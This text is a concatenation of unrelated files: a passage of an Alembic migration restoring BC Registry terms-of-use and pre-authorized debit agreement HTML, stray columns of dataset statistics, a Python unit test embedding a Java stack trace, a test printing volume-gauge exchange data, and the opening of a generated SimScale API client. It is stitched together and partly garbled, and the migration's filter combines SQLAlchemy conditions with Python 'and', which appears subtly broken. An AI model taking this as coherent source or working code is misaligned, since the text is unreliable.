<p><span>(e)</span> does not use the Service for any inappropriate or unlawful purpose.</p>
</div>
</div>
</section>
<section>
<header><span>6.</span> FEES</header>
<div>
<p><span>6.1</span> The Subscriber will pay to the Province all applicable Fees for the Services.</p>
<p><span>6.2</span> Fees payable for Transactions processed by Premium Account Subscribers will be charged to the applicable Deposit Account and in accordance with the BC Online Terms and Conditions.</p>
<p><span>6.3</span> Fees payable for Transactions processed by Basic Account Subscribers will be payable by credit card before the Transaction is processed.</p>
</div>
</section>
<section>
<header><span>7.</span> RELATIONSHIP</header>
<div>
<p><span>7.1</span> This Agreement will not in any way make the Subscriber or any User an employee, agent or independent contractor of the Province and the Subscriber will not, and will ensure that its Users do not, in any way indicate or hold out to any person that the Subscriber or any User is an employee, agent or independent contractor of the Province.</p>
</div>
</section>
<section>
<header><span>8.</span> SUSPENSION OF SERVICE </header>
<div>
<p><span>8.1</span> The Province may, in its sole discretion, immediately suspend Access upon written notice to the Subscriber if:</p>
<div>
<p><span>(a)</span> the Subscriber or any of its Users has, in the reasonable opinion of the Province, in any way jeopardized the integrity or security of the Service; or</p>
<p><span>(b)</span> the Subscriber or any of its Users has violated any other provision of this Agreement.</p>
</div>
</div>
</section>
<section>
<header><span>9.</span> TERMINATION</header>
<div>
<p><span>9.1 </span>The Province may immediately terminate this Agreement upon written notice to the Subscriber if the Subscriber’s Access has been suspended pursuant to section 8.1.</p>
<p><span>9.2 </span>Upon termination:</p>
<div>
<p><span>(a) </span>the Subscriber will immediately cease, and will ensure that all of its Users immediately cease, all use of the Service and all Passcodes; and</p>
<p><span>(b) </span>Premium Account Subscribers will pay to the Province all unpaid Fees incurred by the Subscriber up to the date of termination.</p>
</div>
<p><span>9.3 </span>In the event that a Subscriber’s Agreement is terminated, the Province reserves the right to refuse future Access to that Subscriber or to downgrade a Premium Account Subscriber to a Basic Account Subscriber, in which case the Subscriber acknowledges and agrees that it is only entitled to Access up to ten Entities and will release any Entities in excess of that number.</p>
</div>
</section>
<section>
<header>10. WARRANTY DISCLAIMER, LIMITATION OF LIABILITY AND INDEMNITY</header>
<div>
<p><span>10.1 </span>The subscriber acknowledges and confirms that the subscriber understands that this article 10 requires the subscriber to assume the full risk in respect of any use of the services by the subscriber and/or its users.</p>
<p><span>10.2 </span>Except as expressly set out in this Agreement, and in addition to the Province’s general Warranty Disclaimer and Limitation of Liabilities, the Province assumes no responsibility or liability to any person using the Service or any Content. In particular, without limiting the general nature of the foregoing:</p>
<div>
<p><span>(a) </span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any direct, indirect, special or consequential damages or other loss, claim or injury, whether foreseeable or unforeseeable (including without limitation claims for damages for personal injury, lost profits, lost savings or business opportunities) arising out of or in any way connected with the use of, or inability to use the Service or any Content;</p>
<p><span>(b) </span>the entire risk as to the quality and performance of the Service or any Content, is assumed by the Subscriber;</p>
<p><span>(c) </span>the Service and all Content are provided “as is”, and the Province disclaims all representations, warranties, conditions, obligations and liabilities of any kind, whether express or implied, in relation to the Service or any Content, including without limitation implied warranties with respect to merchantability, fitness for a particular purpose, error-free or uninterrupted use and non-infringement; and</p>
<p><span>(d) </span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any loss or damage in connection with the Service or any Content, including without limitation any loss or damage caused by any alteration of the format or content of a print copy or electronic display of any information retrieved from the Service, the quality of any print display, the information contained in any screen dump, any system failure, hardware malfunction, manipulation of data, inadequate or faulty Transaction and/or Service, or delay or failure to provide Access to any User or any person using a User's Incorporation Numbers or Passcodes or using any information provided by a Subscriber or any User from the Service.</p>
</div>
<p><span>10.3 </span>The Subscriber must indemnify and save harmless the Province and its respective servants, agents, contractor and employees from any losses, claims, damages, actions, causes of action, costs and expenses that the Province or any of its respective servants, agents, contractors or employees may sustain, incur, suffer or be put to at any time, either before or after this Agreement ends, including any claim of infringement of third-party intellectual property rights, where the same or any of them are based upon, arise out of or occur, directly or indirectly, by reason of any act or omission by the Subscriber or by any of the Subscriber’s agents, employees, officers or directors in connection with this Agreement.</p>
</div>
</section>
<section>
<header>11. GENERAL</header>
<div>
<p><span>11.1 </span>In this Agreement,</p>
<div>
<p><span>(a) </span>unless the context otherwise requires, references to sections by number are to sections of the Agreement;</p>
<p><span>(b) </span>unless otherwise specified, a reference to a statute by name means the statute of British Columbia by that name, as amended or replaced from time to time;</p>
<p><span>(c) </span>“person” includes an individual, partnership, corporation or legal entity of any nature; and</p>
<p><span>(d) </span>unless the context otherwise requires, words expressed in the singular includes the plural and vice versa.</p>
</div>
<p><span>11.2 </span>This Agreement is the entire agreement between the Subscriber and the Province with respect to the subject matter of this Agreement, and supercedes and replaces any prior and/or written agreements.</p>
<p><span>11.3 </span>The headings in this Agreement are inserted for convenience only, and will not be used in interpreting or construing any provision of this Agreement</p>
<p><span>11.4 </span>All provisions in this Agreement in favour or either party and all rights and remedies of either party, either at law or in equity, will survive the expiration or sooner termination of this Agreement.</p>
<p><span>11.5 </span>If any provision of this Agreement is invalid, illegal or unenforceable, that provision will be severed from this Agreement and all other provisions will remain in full force and effect.</p>
<p><span>11.6 </span>This Agreement will be governed by and construed in accordance with the laws of British Columbia and the laws of Canada applicable therein. By using the Service, the Subscriber consents to the exclusive jurisdiction and venue of the courts of the province of British Columbia for the hearing of any dispute arising from or related to this Agreement and/or the Subscriber’s use of the Service.</p>
</div>
</section>
</article>
"""
documents = table('documents',
column('version_id', String),
column('type', String),
column('content_type', String),
column('content', String))
op.execute(
documents.update()
.where(documents.c.version_id==op.inline_literal('3') and documents.c.type=='termsofuse' )
.values({'content':op.inline_literal(tos_version3_content)})
)
# change pad-terms content back
pad_terms_content = """
<section>
<header>
In this agreement:
</header>
<p>
“the biller” refers to “Her Majesty the Queen in Right of the Province of British Columbia as represented by the Minister of Citizen’s Services - BC Registry and Online Services (Prov of BC);
</p>
<p>
“the payor” refers to the Premium Account Subscriber of the BC Registry Service as defined in the BC Registry Terms and Conditions of Agreement (the “BC Registry Terms”); and</p>
<p>
unless defined herein, capitalized terms in this agreement will have the meaning as set out in BC Registry Terms.
</p>
</section>
<section>
<header>
The payor acknowledges or understands:
</header>
<ol>
<li>
That this authorization is provided for the benefit of the biller and our financial institution, and is provided in consideration of the Payor’s Financial Institution agreeing to process debits (PADs) against the bank account as indicated in the biller’s PAD application webform and in accordance with the rules of <a href="http://www.payments.ca" target="_blank">Payments Canada</a>.
</li>
<li>
Ticking the acceptance box on the biller’s PAD application webform will be considered equivalent to my signature and will constitute valid authorization for the processing financial institution to debit the payor’s account as identified in the biller’s PAD application webform (the “Payor’s Bank Account”).
</li>
<li>
This authority will remain in effect until the biller has received written communication from the payor of cancellation or changes relating to the Payor’s Bank Account.
</li>
<li>
The payor may cancel this PAD agreement at any time with written notification to the biller. Written notification of changes or cancellation must be received at least 10 business days prior to the next online order or withdrawal. Notification must be in writing and sent either through the biller’s BC Registry website or by mail to the address provided below. A sample cancellation form or more information on my right to cancel a PAD Agreement can be obtained at my financial institution or by visiting <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
That cancellation of this agreement by the payor or the biller:
<ol type="a">
<li>
will result in the suspension of the payors’ Premium Account Subscriber account Access until the payor takes action to authorize another payment method; and
</li>
<li>
does not cancel any amount owed for the Service received prior to cancellation.
</li>
</ol>
</li>
<li>
Correspondence regarding this agreement will be sent to the payor at the email address associated with the payor’s Premium Subscriber Account (the “Payor’s Email Address”). The payor agrees that any communication sent by the biller to that email address will be deemed to have been received by the payor and acknowledges that it is the payor’s responsibility to notify the biller as soon as possible of changes to the Payor’s Email Address.
</li>
<li>
<strong>The biller notification of enrollment or cancellation of this Pre-Authorized Debit Agreement to the Payor is being reduced from 15 calendar days to 3 calendar days in accordance with the H1 rule of Payments Canada. Notification will be delivered electronically to the Payor’s Email Address.</strong>
</li>
<li>
The payor has certain recourse rights if any debit does not comply with the terms of this business PAD agreement (for example, the right to receive reimbursement for any PAD that is not authorized or is not consistent with terms and conditions of this PAD Agreement). To obtain a form for reimbursement or for more information on recourse rights, contact your financial institution or visit <a href="http://www.payments.ca" target="_blank">www.payments.ca</a>.
</li>
<li>
Any payment dishonoured by the payor’s financial institution may result in a dishonoured banking instrument service fee, as prescribed by the Minister of Finance, being applied to the payor’s Premium Account Subscriber account. The biller is not responsible for any additional service fees charged by your financial institution.
</li>
<li>
In the event of a dishonoured payment, the biller reserves the right to suspend the payor’s Access until the payor has taken action to re-activate Access by paying any outstanding Fees and dishonoured banking instrument service fees by credit card.
</li>
<li>
Due to a delay in payment processing, the biller may subsequently suspend the payor’s Access after a payor has taken action to re-activate Access if another PAD is dishonoured in the intervening period.
</li>
<li>
The amount of the daily (excludes weekends and holidays) withdrawal is variable and dependent on the total daily Transactions charged to the payors’ Premium Account Subscriber’s account by Team Members who are authorized to order BC Registry Services.
</li>
<li>
<strong>The standard 10 calendar day pre-notification period for the sporadic and variable pre-authorized withdrawals will be reduced to 1-2 business days.</strong>
</li>
<li>
The biller will provide PAD pre-notification 1-2 business days prior to the withdrawal date. This notification will confirm the amount and estimated date of the pre-authorized withdrawal, will provide a list of all services ordered & other account adjustments and will be delivered electronically to the Payor’s Email Address.
</li>
<li>
Your financial institution is not responsible for verifying whether payment has been issued in accordance with the particulars of this agreement.
</li>
</ol>
</section>
<section>
<header>
<strong>Payor Authorization:</strong>
</header>
<p>
I have read, understood and agree to the terms and conditions of the Business Pre-Authorized Debit Terms and Conditions for BC Registry Services
</p>
<p>
I confirm, I am an authorized representative for the payor and authorized signatory on the account to be debited under this agreement.
</p>
<p>
I authorize the biller to withdraw funds from the bank account as indicated above as per the terms and conditions of this agreement.
</p>
<p>
Dated: Month Day, Year
</p>
</section>
"""
op.execute(
documents.update()
.where(documents.c.version_id==op.inline_literal('p1') and documents.c.type=='termsofuse_pad' )
.values({'content':op.inline_literal(pad_terms_content)})
)
# ### end Alembic commands ###
| 99.576608
| 794
| 0.705948
| 12,919
| 85,138
| 4.647496
| 0.068736
| 0.044603
| 0.020253
| 0.006063
| 0.890225
| 0.874236
| 0.851901
| 0.832081
| 0.823954
| 0.81506
| 0
| 0.007748
| 0.214734
| 85,138
| 854
| 795
| 99.693208
| 0.890302
| 0.004722
| 0
| 0.58
| 0
| 0.36625
| 0.978429
| 0.07691
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0025
| false
| 0.0225
| 0.005
| 0
| 0.0075
| 0.01375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cf1a0adbe8d491d80a0bacd2c2a286cb30eb4f69
| 136
|
py
|
Python
|
dataservice/api/genomic_file/__init__.py
|
ConnorBarnhill/kf-api-dataservice
|
547df467a307788882469a25c947a14965a26336
|
[
"Apache-2.0"
] | 6
|
2018-01-25T13:49:24.000Z
|
2020-03-07T16:25:09.000Z
|
dataservice/api/genomic_file/__init__.py
|
ConnorBarnhill/kf-api-dataservice
|
547df467a307788882469a25c947a14965a26336
|
[
"Apache-2.0"
] | 369
|
2018-01-17T15:22:18.000Z
|
2022-03-10T19:14:56.000Z
|
dataservice/api/genomic_file/__init__.py
|
ConnorBarnhill/kf-api-dataservice
|
547df467a307788882469a25c947a14965a26336
|
[
"Apache-2.0"
] | 3
|
2018-04-11T14:18:37.000Z
|
2018-10-31T19:09:48.000Z
|
from dataservice.api.genomic_file.resources import GenomicFileAPI
from dataservice.api.genomic_file.resources import GenomicFileListAPI
| 45.333333
| 69
| 0.897059
| 16
| 136
| 7.5
| 0.5625
| 0.25
| 0.3
| 0.416667
| 0.733333
| 0.733333
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 136
| 2
| 70
| 68
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
d86dc9751469d674801b9b451d32358fa2aa0b96
| 8,296
|
py
|
Python
|
tests/test_PythonBinding.py
|
lsst-camera-dh/jh-ccs-utils
|
2f9b1cea5ceb72319a13f8720a6f10b701a9513f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
tests/test_PythonBinding.py
|
lsst-camera-dh/jh-ccs-utils
|
2f9b1cea5ceb72319a13f8720a6f10b701a9513f
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2018-08-02T02:29:36.000Z
|
2018-09-26T19:46:24.000Z
|
tests/test_PythonBinding.py
|
lsst-camera-dh/jh-ccs-utils
|
2f9b1cea5ceb72319a13f8720a6f10b701a9513f
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
import unittest
import re
from PythonBinding import CcsPythonExecutorThread
# This is the socket text from run 11063 for which the exception handling
# failed (see LSSTTD-1418):
socket_text = b"""
org.lsst.ccs.command.CommandInvocationException: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:101)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:77)
at org.lsst.ccs.command.CompositeCommandSet.invoke(CompositeCommandSet.java:92)
at org.lsst.ccs.Agent$RunningCommand.lambda$new$1(Agent.java:1052)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at java.io.FileInputStream.open0(Native Method)
at java.io.FileInputStream.open(FileInputStream.java:195)
at java.io.FileInputStream.<init>(FileInputStream.java:138)
at java.io.FileReader.<init>(FileReader.java:72)
at org.lsst.ccs.subsystem.ts8.FitsUtilities.readPhotoDiodeFile(FitsUtilities.java:54)
at org.lsst.ccs.subsystem.ts8.FitsUtilities.updatePhotoDiodeValues(FitsUtilities.java:205)
at org.lsst.ccs.subsystem.ts8.TS8Subsystem.addBinaryTable(TS8Subsystem.java:1133)
at sun.reflect.GeneratedMethodAccessor75.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:84)
... 9 more
org.lsst.ccs.command.CommandInvocationException: org.lsst.ccs.command.CommandInvocationException: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at org.python.core.Py.JavaError(Py.java:552)
at org.python.core.Py.JavaError(Py.java:543)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:190)
at org.python.core.PyObject.__call__(PyObject.java:438)
at org.python.core.PyMethod.instancemethod___call__(PyMethod.java:237)
at org.python.core.PyMethod.__call__(PyMethod.java:228)
at org.python.core.PyMethod.__call__(PyMethod.java:223)
at org.python.core.PyObject._callextra(PyObject.java:620)
at ccs_scripting_tools$py.sendSynchCommand$4(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py:35)
at ccs_scripting_tools$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:308)
at org.python.core.PyBaseCode.call(PyBaseCode.java:199)
at org.python.core.PyFunction.__call__(PyFunction.java:482)
at org.python.core.PyMethod.instancemethod___call__(PyMethod.java:237)
at org.python.core.PyMethod.__call__(PyMethod.java:228)
at org.python.core.PyMethod.__call__(PyMethod.java:223)
at org.python.core.PyObject._callextra(PyObject.java:620)
at ccs_scripting_tools$py.synchCommand$5(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py:38)
at ccs_scripting_tools$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/jh-ccs-utils-0.1.5/python/ccs_scripting_tools.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:308)
at org.python.core.PyBaseCode.call(PyBaseCode.java:162)
at org.python.core.PyFunction.__call__(PyFunction.java:434)
at org.python.core.PyMethod.__call__(PyMethod.java:156)
at eo_acquisition$py.add_pd_time_history$31(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py:569)
at eo_acquisition$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:171)
at org.python.core.PyFunction.__call__(PyFunction.java:434)
at org.python.core.PyMethod.__call__(PyMethod.java:156)
at eo_acquisition$py.get_readings$32(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py:589)
at eo_acquisition$py.call_function(/gpfs/slac/lsst/fs2/u1/dh/software/centos7-gcc48/prod/0.2.4/IandT-jobs-0.2.0/python/eo_acquisition.py)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:189)
at org.python.core.PyFunction.__call__(PyFunction.java:446)
at org.python.core.PyMethod.__call__(PyMethod.java:171)
at org.python.pycode._pyx11657.run$3(<script>:32)
at org.python.pycode._pyx11657.call_function(<script>)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyBaseCode.call(PyBaseCode.java:139)
at org.python.core.PyFunction.__call__(PyFunction.java:413)
at org.python.core.PyMethod.__call__(PyMethod.java:126)
at org.python.pycode._pyx11657.f$0(<script>:62)
at org.python.pycode._pyx11657.call_function(<script>)
at org.python.core.PyTableCode.call(PyTableCode.java:171)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1614)
at org.python.core.Py.exec(Py.java:1658)
at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:276)
at org.lsst.ccs.subsystems.console.jython.JythonInterpreterConsole$JythonProcessingThread.run(JythonInterpreterConsole.java:371)
Caused by: org.lsst.ccs.command.CommandInvocationException: java.io.FileNotFoundException: /gpfs/slac/lsst/fs3/g/data/jobHarness/jh_stage/LCA-11021_RTM/LCA-11021_RTM-012/11063/flat_pair_raft_acq/v0/85812/pd-values_1558834388-for-seq-24-exp-1.txt (No such file or directory)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:101)
at org.lsst.ccs.command.CommandSetBuilder$CommandSetImplementation.invoke(CommandSetBuilder.java:77)
at org.lsst.ccs.command.CompositeCommandSet.invoke(CompositeCommandSet.java:92)
at org.lsst.ccs.Agent$RunningCommand.lambda$new$1(Agent.java:1052)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
"""
class FakeSocketConnection:
def __init__(self, socket_text):
self.socket_text = socket_text
def recv(self, arg):
return self.socket_text
class CcsPythonExecutorThreadTestCase(unittest.TestCase):
"""TestCase subclass for CcsPythonExecutorThread."""
def setUp(self):
pass
def tearDown(self):
pass
def test_java_exception_handling(self):
"""Test handling of java exception messages in the socket output."""
thread_id = b'0'
my_socket_text = socket_text + b"\ndoneExecution:" + thread_id
socket_connection = FakeSocketConnection(my_socket_text)
executor = CcsPythonExecutorThread(thread_id.decode('utf-8'),
socket_connection)
executor.running = True
executor.listenToSocketOutput()
self.assertNotEqual(len(executor.java_exceptions), 0)
if __name__ == '__main__':
unittest.main()
| 65.322835
| 311
| 0.803399
| 1,243
| 8,296
| 5.226066
| 0.193886
| 0.042334
| 0.071121
| 0.085437
| 0.739994
| 0.716441
| 0.712284
| 0.700893
| 0.659945
| 0.659945
| 0
| 0.065529
| 0.067382
| 8,296
| 126
| 312
| 65.84127
| 0.774073
| 0.025072
| 0
| 0.424779
| 0
| 0.20354
| 0.888559
| 0.812283
| 0
| 0
| 0
| 0
| 0.00885
| 1
| 0.044248
| false
| 0.017699
| 0.026549
| 0.00885
| 0.097345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d87fc414ece933ef900dba9d7f95b7affd53592d
| 5,111
|
py
|
Python
|
tests/test_volumegauge.py
|
manifoldfinance/utilities
|
d86d2bfb86925352ada81a2a53d50900c9105bcc
|
[
"MIT"
] | null | null | null |
tests/test_volumegauge.py
|
manifoldfinance/utilities
|
d86d2bfb86925352ada81a2a53d50900c9105bcc
|
[
"MIT"
] | null | null | null |
tests/test_volumegauge.py
|
manifoldfinance/utilities
|
d86d2bfb86925352ada81a2a53d50900c9105bcc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import pytest
def test_exchange_cdai_to_cusdc(volumegauge, cDAI, cUSDC, tracker, accounts):
last_reward_amount = tracker.rewardAmount()
volumegauge.exchange(0, 1, 10 ** 8, 0, {'from': accounts[0]})
track_data_size = tracker.trackDataSize(accounts[0])
track_data = tracker.trackData(accounts[0], track_data_size - 1)
current_reward_amount = tracker.rewardAmount()
print("token_x : " + str(track_data[0]))
print("price_x : " + str(track_data[1]) + " (" + str(float(track_data[1]) / 10 ** 8) + " USD)")
print("amount_x : " + str(track_data[2]) + " (" + str(float(track_data[2]) / 10 ** cDAI.decimals()) + " tokens)")
print("token_y : " + str(track_data[3]))
print("price_y : " + str(track_data[4]) + " (" + str(float(track_data[4]) / 10 ** 8) + " USD)")
print("amount_y : " + str(track_data[5]) + " (" + str(float(track_data[5]) / 10 ** cUSDC.decimals()) + " tokens)")
print("source_addr : " + str(track_data[6]))
print("contract_addr : " + str(track_data[7]))
print("time_stamp : " + str(track_data[8]))
print("reward_amount : " + str(current_reward_amount) + " (USD, decimals are 8 digits)")
print("increased_reward_amount_in_USD : " + str(float(current_reward_amount - last_reward_amount) / 10 ** 8) + " USD")
def test_exchange_cusdc_to_cdai(volumegauge, cUSDC, cDAI, tracker, accounts):
last_reward_amount = tracker.rewardAmount()
volumegauge.exchange(1, 0, 10 ** 8, 0, {'from': accounts[0]})
track_data_size = tracker.trackDataSize(accounts[0])
track_data = tracker.trackData(accounts[0], track_data_size - 1)
current_reward_amount = tracker.rewardAmount()
print("token_x : " + str(track_data[0]))
print("price_x : " + str(track_data[1]) + " (" + str(float(track_data[1]) / 10 ** 8) + " USD)")
print("amount_x : " + str(track_data[2]) + " (" + str(float(track_data[2]) / 10 ** cUSDC.decimals()) + " tokens)")
print("token_y : " + str(track_data[3]))
print("price_y : " + str(track_data[4]) + " (" + str(float(track_data[4]) / 10 ** 8) + " USD)")
print("amount_y : " + str(track_data[5]) + " (" + str(float(track_data[5]) / 10 ** cDAI.decimals()) + " tokens)")
print("source_addr : " + str(track_data[6]))
print("contract_addr : " + str(track_data[7]))
print("time_stamp : " + str(track_data[8]))
print("reward_amount : " + str(current_reward_amount) + " (USD, decimals are 8 digits)")
print("increased_reward_amount_in_USD : " + str(float(current_reward_amount - last_reward_amount) / 10 ** 8) + " USD")
def test_exchange_underlying_dai_to_usdc(volumegauge, DAI, USDC, tracker, accounts):
last_reward_amount = tracker.rewardAmount()
volumegauge.exchange_underlying(0, 1, 10 ** 18, 0, {'from': accounts[0]})
track_data_size = tracker.trackDataSize(accounts[0])
track_data = tracker.trackData(accounts[0], track_data_size - 1)
current_reward_amount = tracker.rewardAmount()
print("token_x : " + str(track_data[0]))
print("price_x : " + str(track_data[1]) + " (" + str(float(track_data[1]) / 10 ** 8) + " USD)")
print("amount_x : " + str(track_data[2]) + " (" + str(float(track_data[2]) / 10 ** DAI.decimals()) + " tokens)")
print("token_y : " + str(track_data[3]))
print("price_y : " + str(track_data[4]) + " (" + str(float(track_data[4]) / 10 ** 8) + " USD)")
print("amount_y : " + str(track_data[5]) + " (" + str(float(track_data[5]) / 10 ** USDC.decimals()) + " tokens)")
print("source_addr : " + str(track_data[6]))
print("contract_addr : " + str(track_data[7]))
print("time_stamp : " + str(track_data[8]))
print("reward_amount : " + str(current_reward_amount) + " (USD, decimals are 8 digits)")
print("increased_reward_amount_in_USD : " + str(float(current_reward_amount - last_reward_amount) / 10 ** 8) + " USD")
def test_exchange_underlying_usdc_to_dai(volumegauge, USDC, DAI, tracker, accounts):
last_reward_amount = tracker.rewardAmount()
volumegauge.exchange_underlying(1, 0, 10 ** 6, 0, {'from': accounts[0]})
track_data_size = tracker.trackDataSize(accounts[0])
track_data = tracker.trackData(accounts[0], track_data_size - 1)
current_reward_amount = tracker.rewardAmount()
print("token_x : " + str(track_data[0]))
print("price_x : " + str(track_data[1]) + " (" + str(float(track_data[1]) / 10 ** 8) + " USD)")
print("amount_x : " + str(track_data[2]) + " (" + str(float(track_data[2]) / 10 ** USDC.decimals()) + " tokens)")
print("token_y : " + str(track_data[3]))
print("price_y : " + str(track_data[4]) + " (" + str(float(track_data[4]) / 10 ** 8) + " USD)")
print("amount_y : " + str(track_data[5]) + " (" + str(float(track_data[5]) / 10 ** DAI.decimals()) + " tokens)")
print("source_addr : " + str(track_data[6]))
print("contract_addr : " + str(track_data[7]))
print("time_stamp : " + str(track_data[8]))
print("reward_amount : " + str(current_reward_amount) + " (USD, decimals are 8 digits)")
print("increased_reward_amount_in_USD : " + str(float(current_reward_amount - last_reward_amount) / 10 ** 8) + " USD")
| 67.25
| 122
| 0.640579
| 705
| 5,111
| 4.377305
| 0.08227
| 0.186649
| 0.139987
| 0.08814
| 0.944588
| 0.934219
| 0.934219
| 0.934219
| 0.934219
| 0.889501
| 0
| 0.035253
| 0.167482
| 5,111
| 75
| 123
| 68.146667
| 0.690012
| 0.003326
| 0
| 0.753623
| 0
| 0
| 0.176713
| 0.023562
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.014493
| 0
| 0.072464
| 0.637681
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
d89bdadf82f192fb92417943ea792b5a680ab1ea
| 32,212
|
py
|
Python
|
simscale_sdk/api/geometries_api.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | 8
|
2021-01-22T13:41:03.000Z
|
2022-01-03T09:00:10.000Z
|
simscale_sdk/api/geometries_api.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | null | null | null |
simscale_sdk/api/geometries_api.py
|
slainesimscale/simscale-python-sdk
|
db483eeabe558e55d020f5f829a3bf13c9c287a7
|
[
"MIT"
] | 3
|
2021-03-18T15:52:52.000Z
|
2022-01-03T08:59:30.000Z
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from simscale_sdk.api_client import ApiClient
from simscale_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class GeometriesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_geometries(self, project_id, **kwargs): # noqa: E501
"""List geometries within a project # noqa: E501
Only valid geometries that can be used for a simulation setup are included. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
